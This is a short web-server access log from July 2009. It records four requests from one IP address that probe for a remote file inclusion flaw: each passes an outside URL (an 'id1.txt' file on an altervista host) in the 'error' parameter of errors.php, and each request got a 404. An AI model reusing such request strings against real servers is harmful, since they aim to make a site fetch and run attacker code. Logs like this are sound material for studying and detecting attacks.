76.163.252.93 - - [15/Jul/2009:06:57:27 -0400] "GET /logs//errors.php?error=http://t0ys.altervista.org/id1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
76.163.252.93 - - [15/Jul/2009:06:57:30 -0400] "GET //errors.php?error=http://t0ys.altervista.org/id1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
76.163.252.93 - - [15/Jul/2009:06:57:30 -0400] "GET /logs//errors.php?error=http://t0ys.altervista.org/id1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
76.163.252.93 - - [15/Jul/2009:06:57:50 -0400] "GET /logs/access_log.Q109051700%20%20//errors.php?error=http://t0ys.altervista.org/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
